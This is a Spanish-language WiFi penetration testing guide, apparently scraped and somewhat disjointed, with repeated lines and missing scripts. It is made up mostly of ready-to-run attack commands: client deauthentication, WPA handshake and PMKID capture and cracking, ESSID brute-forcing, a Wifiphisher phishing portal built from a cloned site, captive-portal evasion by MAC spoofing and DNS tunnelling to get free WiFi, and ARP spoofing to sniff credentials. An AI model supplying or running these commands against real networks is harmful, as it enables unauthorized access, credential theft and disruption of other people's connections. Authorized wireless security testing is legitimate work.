
Guía de Pruebas de Penetración WiFi
2.1. Portales cautivos
3.1. Sin clientes
4.1. Descifrando el handshake de 4 vías
4.2. Ataque PMKID
4.3. Ataque sin AP
5.2. Fuerza bruta
6.1. Ataque Krack y Ataque Frag
6.2. OSINT
6.3. Bloqueo WiFi
6.4. Otros frameworks
7.1. Atacando el router
7.2. Tipos de escáneres
7.3. Spoofing
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Establecer modo monitor
Ejecutar Airodump-ng-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Lista las redes usando Airodump-ng y obtén la dirección MAC del AP ($AP_MAC) y la de un cliente ($CLIENT_MAC). No detengas la captura.
En otra terminal, desautentica un cliente o todos ellos. Cuando Airodump-ng capture un handshake de esta red, el nombre o ESSID aparecerá en la primera terminal:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Lista las redes usando Airodump-ng y obtén la dirección MAC del AP ($AP_MAC) y la de un cliente ($CLIENT_MAC). No detengas la captura.
2.a. Ejecutar un ataque de diccionario
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. O ejecutar un ataque de fuerza bruta
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
Para el conjunto de caracteres es posible usar l (letras minúsculas), u (letras mayúsculas), n (números), c (minúsculas+mayúsculas), m (minúsculas+mayúsculas+números) o a (todos los imprimibles).
Clona un sitio web usando HTTrack
Instala Wifiphiser. Añade el resultado de HTTrack en una nueva carpeta en wifiphisher/data/phishing-pages/new_page/html y un archivo de configuración en wifiphisher/data/phishing-pages/new_page/config.ini.
Recompila el proyecto usando python setup.py install o el binario en bin.
Este comando funciona correctamente en la última versión de Kali después de instalar hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
El primer método para evitar un portal cautivo es cambiar tu dirección MAC a la de un usuario ya autenticado.
macchanger
Un script personalizado como este(Bash)
También puedes usar scripts para automatizar el proceso como:
Un segundo método es crear un túnel DNS. Para ello, es necesario tener un servidor DNS propio accesible. Puedes usar este método para evitar el portal cautivo y obtener WiFi "gratis" en hoteles, aeropuertos...
nslookup example.com
Un "registro A": dns.$DOMAIN apuntando a $SERVER_IP (Ejemplo: dns.domain.com 139.59.172.117)
Un "registro NS": hack.$DOMAIN apuntando a dns.$DOMAIN (Ejemplo: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
Verifica si funciona correctamente aquí
Ejecución en el cliente
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
Una vez que estás en la red, puedes probar si es vulnerable a ataques Man in the Middle.
Ataque de ARP Spoofing usando Ettercap
Sniffe el tráfico usando Wireshark o TCPdump
Analiza el tráfico usando PCredz (Linux) o Network Miner (Windows)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
Puedes obtener wordlists desde aquí.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
Puedes usar este script o seguir estos pasos:
Instala Hcxdumptool y Hcxtool (puedes usar este script).
Detén Network Manager
airmon-ng check kill
3a. Si quieres atacar una dirección MAC específica
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2